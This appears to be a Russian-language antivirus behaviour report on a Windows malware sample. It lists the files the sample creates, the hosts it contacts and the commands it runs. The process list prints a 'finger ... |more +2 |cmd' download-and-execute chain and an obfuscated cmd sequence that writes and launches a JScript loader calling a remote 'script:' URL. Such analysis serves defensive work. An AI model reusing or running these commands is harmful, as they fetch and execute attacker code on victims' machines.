Техническая информация
Вредоносные функции
Создает и запускает на исполнение
- '<SYSTEM32>\finger.exe' ok@war3.confirmacaodelogin.icu
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\Ubo.js"
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\ubo.js
Сетевая активность
Подключается к
- 'wa##.###firmacaodelogin.icu':79
- 'is####.#ahiy5jq66gf.best':80
TCP
- 'wa##.###firmacaodelogin.icu':79
UDP
- DNS ASK wa##.###firmacaodelogin.icu
- DNS ASK is####.#ahiy5jq66gf.best
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c finger ok@war3.confirmacaodelogin.icu |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt PMIE=.j&&SEt IKBCH=v0HwMar0HwM a =0HwM 'sc0HwMri0HwMpt0HwM:'; b =0HwM 'h0HwMTtP0HwM:'; G0HwMet0HwMObj0HwMec0HwMt(0HwMa+b+'&&sET KUM8=ZBWCMZBWCMisuudk.oahiy5jq66gf.bestZBWCM?1ZBWCM')...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p IWEOV="%IKBCH:0HwM=%%KUM8:ZBWCM=/%" 0<nul 1>%LOCALAPPDATA%\Ubo%PMIE%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\Ubo%PMIE%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\Ubo.js
